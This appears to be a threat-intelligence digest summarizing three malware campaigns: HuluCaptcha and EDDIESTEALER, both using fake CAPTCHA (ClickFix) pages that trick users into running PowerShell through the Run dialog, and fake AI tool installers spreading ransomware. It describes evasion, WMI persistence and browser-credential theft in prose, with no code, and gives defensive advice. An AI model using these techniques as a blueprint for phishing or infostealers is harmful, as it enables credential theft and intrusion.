HuluCaptcha Phishing Campaign Using Fake CAPTCHA to Deploy Malware
A sophisticated phishing campaign utilizing a fake CAPTCHA system called "HuluCaptcha" has been uncovered. The campaign begins with phishing emails that direct users to fraudulent websites featuring seemingly legitimate CAPTCHA challenges. The hidden malicious code is activated when victims interact with these CAPTCHA prompts. This code leverages the Windows Run command (Win+R) to execute system commands, using PowerShell or CMD to download additional malware payloads. The attackers employ multiple layers of obfuscation, including Base64 encoding and custom ciphers, to prevent detection by traditional security systems. The malicious JavaScript within the fake CAPTCHA interface deceives users by maintaining the appearance of a legitimate verification process, all while silently running commands in the background. This approach effectively bypasses security solutions that fail to monitor or restrict specific execution pathways like the shell: protocol handler in Windows. Once the malware gains access to a victim’s system, it uses Windows Management Instrumentation (WMI) for persistence, creating scheduled tasks that periodically connect to command servers. The attack infrastructure involves compromised WordPress sites acting as distribution points for the phishing pages. The modular malware enables attackers to deploy various malicious payloads, such as keyloggers, clipboard hijackers, or advanced data exfiltration tools targeting specific enterprise applications. Attackers also employ techniques to avoid detection by rotating their command and control servers and using certificate pinning to prevent traffic interception. Organizations are advised to implement enhanced monitoring for suspicious PowerShell and WMI activity, restrict execution from temporary directories, and deploy application allowlisting policies. Ongoing security awareness training is critical to help employees recognize and respond to increasingly sophisticated CAPTCHA-based phishing threats.
Fake AI Tool Installers Distribute Multiple Ransomware and Malware Families
Cybercriminals are exploiting the growing interest in artificial intelligence (AI) tools to distribute several dangerous ransomware families, including CyberLock, Lucky_Gh0$t, and a new malware called Numero. These threats are spread through fake installers for AI tools like OpenAI’s ChatGPT and InVideo AI, often promoted through SEO poisoning techniques to boost rankings and attract unsuspecting victims. Once the malicious software is downloaded, it deploys ransomware or malware. Numero corrupts the graphical user interface (GUI) of Windows, rendering the system unusable by manipulating its desktop components. These malicious campaigns primarily target users in business sectors relying on AI tools, particularly B2B sales and marketing. The attackers often use compromised legitimate websites to host the fake installers, convincing users to download what they believe are free AI tools. Once executed, the malware gains persistence through registry keys and memory, complicating efforts to detect and remove it. Users are urged to be cautious when downloading AI tools and to verify the sources' legitimacy, especially when offered with promises of free access. Organizations should enhance monitoring of systems for unusual activity, restrict downloads from untrusted sources, and deploy advanced endpoint protection to mitigate these risks.
EDDIESTEALER Malware Exploits Fake CAPTCHA Pages to Harvest Sensitive Data
EDDIESTEALER is a new Rust-based information stealer malware distributed through a sophisticated social engineering attack leveraging fake CAPTCHA verification pages, commonly known as ClickFix. In these attacks, threat actors compromise legitimate websites and serve malicious JavaScript that prompts users to complete a CAPTCHA. Once the victim interacts with the fake CAPTCHA, a PowerShell script is triggered via the Windows Run dialog, ultimately downloading and deploying EDDIESTEALER. The malware is designed to harvest sensitive information, including browser cookies, passwords, cryptocurrency wallet data, and system metadata. It bypasses Chrome’s app-bound encryption using a Rust-based implementation of ChromeKatz, which extracts unencrypted browser data, even when the browser is not actively running. The malware also employs advanced evasion techniques, including self-deletion if it detects analysis tools or sandbox environments, making it difficult to detect and mitigate. This malware campaign has been linked to active exploitation in the wild, with threat actors using it to target specific industries, including the finance and cryptocurrency sectors, which are prime targets for data theft. The malware has been observed in attacks that leverage compromised websites and social media ads to distribute fake installers for popular AI tools. The threat actor behind this campaign demonstrates advanced operational security, using rotating command-and-control servers and employing encryption for communications to evade detection. The EDDIESTEALER malware can steal extensive user information, including credentials from popular web browsers and password managers, and exfiltrate it to remote servers. Organizations should implement robust security measures, including enhanced endpoint detection and response (EDR) systems, monitoring for suspicious PowerShell and browser activity, and enforcing application allowlisting policies to defend against this threat. The use of fake CAPTCHA prompts in phishing attacks highlights the increasing sophistication of social engineering tactics, making regular security training and vigilance crucial for users.
